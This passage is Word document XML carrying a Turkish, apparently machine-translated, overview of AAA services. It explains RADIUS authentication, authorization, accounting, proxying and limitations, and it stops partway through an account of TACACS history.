    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A178E4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A178E4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TACACS: Terminal Erişim Kontrol Geçiş Kontrol Sistemi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A178E4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A178E4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ÇAP: İki kez RADIUS?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707CEB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Erişim Kontrollerinin Uygulanması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="2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jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>AAA Hizmetinin Temel Özellikleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008504A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Merkezi bir AAA hizmetinin temel özellikleri (1) dağıtılmış (müşteri / sunucu) güvenlik modeli, (2) doğrulanmış işlemler, (3) esnek kimlik doğrulama mekanizmaları ve (4) genişletilebilir bir protokol içerir. Dağıtılmış güvenlik, kimlik doğrulama işlemini iletişim işleminden ayırır ve kullanıcı kimlik doğrulama bilgilerini tek bir merkezi veritabanında birleştirmeyi mümkün kılar. Ağ erişim cihazları (yani bir NAS) istemcilerdir. Kullanıcı bilgilerini bir AAA sunucusuna iletirler ve sunucunun döndürdüğü yanıtlara göre hareket ederler. Sunucular, kullanıcı bağlantı isteklerini alır, kullanıcıyı doğrular ve kullanıcıya hizmet vermek için gereken konfigürasyon bilgilerini </w:t>
      </w:r>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NAS istemcisine geri gönderir. İade edilen bilgiler arasında taşıma ve protokol parametreleri, ek kimlik doğrulama gereklilikleri (yani geri arama, SecureID), yetkilendirme direktifleri (yani, izin verilen hizmetler, uygulama izinleri) ve muhasebe gereksinimleri yer alabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008504A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İşlemlerin bütünlüğünü sağlamak için müşteri ile sunucu arasındaki aktarımlar doğrulanır. Hassas bilgiler (örneğin şifreler) gizliliği sağlamak ve şifreler ile diğer kimlik doğrulama bilgilerinin iletim sırasında izlenmesini veya yakalanmasını önlemek için paylaşılan bir gizli anahtar kullanılarak şifrelenir. Bu, veriler kamuya açık taşıyıcı (örn., WAN) bağlantıları arasında dolaşırken özellikle önemlidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008504A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AAA sunucuları çeşitli kimlik doğrulama mekanizmalarını destekleyebilir. Bu esneklik kilit bir AAA özelliğidir. Kullanıcı erişimi, PAP (Parola Doğrulama Protokolü), CHAP (Challenge El Sıkışma Kimlik Doğrulama Protokolü), standart UNIX oturum açma işlemi veya sunucu kullanılarak kimliği doğrulanabilir ve bir proxy görevi yapabilir ve kimlik doğrulamasını Microsoft etki alanı denetleyicisi, Novell gibi diğer mekanizmalara iletebilir NDS sunucusu veya bir SecureID ACE sunucusu. Bazı AAA sunucu uygulamaları, daha güvenli bağlantılar için arama numarası tanımlama (arayan kimliği) ve geri arama gibi ek mekanizmalar kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008504A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Teknoloji çok hızlı değiştiğinden, AAA sunucuları genişletilebilir protokollerle tasarlanmıştır. RADIUS, DIAMETER ve TACACS, protokolün mevcut uygulamalarını aksatmadan herhangi bir sayıda yeni parametreyi desteklemek için tasarlanmış değişken uzunluklu nitelik değerleri kullanır. DIAMETER’ın çerçeve yaklaşımı, herhangi bir sayıda özelleştirilmiş AAA modülünü destekleyebilecek bir taşıma mekanizmasını (çerçeve)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B04062">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> standartlaştırarak ek genişletilebilirlik sağlar. Yönetim açısından </w:t>
      </w:r>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bakıldığında, AAA sunucuları aşağıdakiler de dahil olmak üzere bazı önemli avantajlar sağlar:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008504A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Kullanıcılar tek bir ana bilgisayarda tutulduğundan, daha az kullanıcı ayarı ve bakım süresi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008504A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Daha az yapılandırma hatası çünkü formatlar birden fazla erişim cihazında benzerdir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008504A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Öğrenilecek sadece bir sistem sözdizimi olduğundan daha az güvenlik yöneticisi eğitim gereksinimi talepler tek bir sistemden gelir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008504A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">• Azaltılmış yardım masası çağrıları, çünkü kullanıcı arayüzü tüm erişim metotları arasında tutarlılık gösterir </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008504A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Erişim bilgilerinin daha hızlı çoğalması, çünkü bilginin yalnızca sınırlı sayıda AAA sunucusuna kopyalanması gerektiğinden kimlik doğrulama mekanizmaları (yani, SecureID)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008504A5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Genişletilebilir tasarım, mevcut kısıtlamaları bozmadan yeni cihazlar eklemeyi kolaylaştırır</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RADIUS: Uzaktan Kimlik Doğrulama Çevirmeli Kullanıcı Hizmeti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>RADIUS, günümüzde kullanılan en popüler AAA hizmetidir. Popülerliği, Livingston’un RADIUS kaynak kodunun dağıtımını açma kararına bağlanabilir. Kullanıcılar hizmeti birden fazla platformda hızlı bir şekilde sunmakta ve çoğu Livingston'un sonraki sürümlerde standart özellikler olarak dahil ettiği özelleştirilmiş özellikler eklemektedir. Bugün, RADIUS sunucusunun sürümleri, hem ücretsiz hem de ticari kaynaklardan gelen her büyük işletim sistemi için mevcuttur ve RADIUS istemcisi, her büyük satıcının NAS ürünlerinde standarttır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Temel bir RADIUS sunucusu uygulaması iki konfigürasyon dosyasına referansta bulunur. Müşteri konfigürasyonu, müşterinin adresini ve işlemleri doğrulamak için kullanılan paylaşılan sırrı içerir. Kullanıcı, kullanıcı tanımlama ve doğrulama bilgilerini (örneğin, kullanıcı kimliği ve şifre) ile bağlantı ve yetkilendirme parametrelerini içerir. Parametreler, istemci ve sunucu arasında, tek bir UDP paketine yerleştirilmiş basit bir alan formatı kullanılarak iletilir. Biçimin kısaltması ve UDP protokolünün verimliliği (bağlantı yükü yok) sunucunun büyük miktarda istekleri verimli bir şekilde yerine getirmesine olanak tanır. Bununla birlikte, format ve protokol de bir dezavantaja sahiptir. Bugünün çeşitli erişim gereksinimlerinin (yani, ROAMOPS) bazılarına kendilerini iyi borç vermezler ve yeniden iletimler ağır yük veya başarısız düğüm senaryolarında bir sorundur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1. </w:t>
      </w:r>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>AA'yı RADIUS'a Koymak: Doğrulamalar ve Yetkiler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RADIUS'ta sekiz standart işlem türü vardır: erişim isteği, erişim kabulü, erişim reddetme, muhasebe talebi, muhasebe yanıtı, erişim sorgusu, durum sunucusu ve durum istemcisi. Kimlik doğrulama, bir NAS erişim talebi paketinin şifresini çözmek, NAS kaynağını doğrulamak ve erişim talebi parametrelerini kullanıcıya göre doğrulamak suretiyle gerçekleştirilir. Sunucu daha sonra üç kimlik doğrulama yanıtından birini döndürür: erişim kabul, erişim reddet veya erişim mücadelesi. Sonuncusu, belirteci veya geri arama tanımlayıcısından bir defalık şifre gibi ek doğrulama bilgileri için bir istektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yetkilendirme, RADIUS protokolünde ayrı bir fonksiyon değildir, sadece bir doğrulama cevabının bir parçasıdır. Bir RADIUS sunucusu bir erişim isteğini doğruladığında, kullanıcı istemcisinde belirtilen tüm bağlantı niteliklerini NAS istemcisine geri gönderir. Bunlar genellikle veri bağlantısı (yani, PPP, SLIP) ve ağ (yani, TCP / IP, IPX) özelliklerini içerir, ancak aynı zamanda satıcıya özel yetki parametreleri de içerebilir. Böyle bir mekanizma, belirtilen bir ana bilgisayara otomatik olarak bir Telnet veya rlogin oturumu başlatır. Diğer yöntemler arasında, bağlantı noktasını sınırlı bağlantıya sahip belirli bir IP adresine zorlamak veya erişim bağlantı noktasına bir yönlendirme filtresi uygulamak sayılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Üçüncü A: Eh, Bazen Yine de!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Muhasebe, RADIUS'ta ayrı bir işlevdir ve tüm istemciler bunu uygulamaz. NAS istemcisinin RADIUS muhasebe kullanması istenirse, kullanıcının kimliği doğrulandıktan sonra bir Hesap Başlatma paketi ve kullanıcı bağlantıyı kestiğinde bir Hesap Durdurma paketi oluşturur. Accounting-Start paketi, NAS'ın sunduğu hizmet türünü, kullanılan portu ve servis verilen kullanıcıyı açıklar. Accounting-Stop paketi, Başlangıç paketi bilgisini çoğaltır ve geçen </w:t>
      </w:r>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>süre, bayt girişleri ve çıkışları, bağlantı kesme nedeni vb. Gibi oturum bilgilerini ekler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>İleri Düşünme ve Diğer Gee-Whiz Yetenekleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bir RADIUS sunucusu, istemci istekleri için bir proxy görevi görebilir ve bunları diğer kimlik doğrulama alanlarındaki sunuculara iletir. Yönlendirme, adlandırılmış veya sayı alanı dahil olmak üzere bir dizi kritere dayalı olabilir. Bu özellikle departmanlar veya kuruluşlar arasında tek bir modem havuzu paylaşıldığında kullanışlıdır. Varlıkların kimlik doğrulama verilerini paylaşması gerekli değildir; her biri modem havuzundaki sunucudan kendi RADIUS sunucusunu ve hizmet proxy isteklerini koruyabilir. RADIUS, hem kimlik doğrulama hem de muhasebe isteklerini proxy yapabilir. Proxy'ler arasındaki ilişki dağıtılabilir (bire çok) veya hiyerarşik (çoktan bire) olabilir ve istekler birden çok kez iletilebilir. Örneğin, Ek 8.2'de, “ana” sunucunun kullanıcının işleme almak için bölgesel sunucusuna bir istek iletmesine mükemmel şekilde izin verilir. Çoğu RADIUS istemcisi, ikincil bir RADIUS sunucusunu artıklık amacıyla sorgulama yeteneğine sahiptir, ancak bu gerekli değildir. Birincil sunucu çevrimdışı olduğunda avantaj, erişimin devam etmesidir. Dezavantajı, sunucular arasında veri senkronize etmek için gereken yönetimdeki artıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5652770" cy="3313430"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1270"/>
            <wp:docPr id="20" name="Resim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770" cy="3313430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tökezleyen Bloklar, Karmaşıklıklar ve Diğer RADIUS Sınırlamaları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">RADIUS, uzaktan erişim kimlik doğrulaması için iyi çalışır ancak ana bilgisayar veya uygulama kimlik doğrulaması için uygun değildir. Web sunucuları ilk istisna olabilir. Bir RADIUS istemcisini bir Web sunucusuna eklemek, açık ağlardaki kullanıcıların kimliklerini doğrulamak için güvenli bir yöntem sağlar. RADIUS, yalnızca çivilenmiş devreleri veya sistem olaylarını izlemek için hiçbir imkan olmayan basit muhasebe olanakları sağlar. Cihaz tabanlı bağlantı parametreleri yerine kullanıcı bazlı RADIUS'un bir başka önemli kısıtlamasıdır. Tek bir RADIUS sunucusu birkaç farklı NAS cihazı türünü yönettiğinde, kullanıcı yönetimi oldukça karmaşıktır. Standart RADIUS kimlik doğrulaması, bir kullanıcının grup üyeliğini kontrol etmek, </w:t>
      </w:r>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>günün tarihine veya saatine göre erişimi kısıtlamak veya bir kullanıcının hesabını belirli bir tarihte sona erdirmek için kolaylıklar sağlamaz. Bu özellikleri sağlamak için, RADIUS sunucusunun ikincil bir kimlik doğrulama servisiyle ilişkilendirilmesi gerekir. Genel olarak, RADIUS, ek hesap kısıtlamalarının uygulanabileceği NDS veya NT gibi ikincil bir kimlik doğrulama hizmeti ile ilişkilendirildiğinde en iyi şekilde çalışan etkili, esnek ve iyi desteklenmiş bir AAA hizmetidir. RADIUS sürüm 2'nin bir IETF standardı olarak benimsenmesi, iyi bir genel amaçlı kimlik doğrulama, yetkilendirme ve muhasebe hizmeti olarak devam eden başarısını ve önemini kesinlikle sağlayacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TACACS: Terminal Erişim Kontrol Geçiş Kontrol Sistemi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008504A5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Günümüzde TACACS olarak bilinenler aslında protokolün iki evrimini temsil eder. ARPANet günlerinin başlarında geliştirilen orijinal TACACS çok sınırlı bir işlevselliğe sahipti ve UDP taşımacılığını kullandı. 1990'ların başında, protokol ek işlevsellik içerecek şekilde genişletildi ve taşıma TCP'ye değiştirildi. Geriye dönük uyumluluk sağlamak için orijinal işlevler, genişletilmiş işlevlerin altkümeleri olarak dahil edildi. Yeni protokol XTACACS (Genişletilmiş TACACS) olarak adlandırıldı. Neredeyse tüm mevcut TACACS günlükleri RFC1492'de açıklandığı gibi genişletilmiş protokole dayanmaktadır. Cisco Systems, AAA mimarisi için TACACS'ı benimsedi ve kimlik doğrulama, yetkilendirme ve muhasebe işlevlerini ayırarak ve tüm NAS-sunucu iletimlerine şifreleme ekleyerek ürünü daha da geliştirdi. Cisco, kimlik doğrulama alışverişlerinde keyfi uzunluk ve içerik parametrelerine izin vererek TACACS'ın genişletilebilirliğini de geliştirdi. Cisco, TACACS + sürümünü seçti ancak gerçekte, 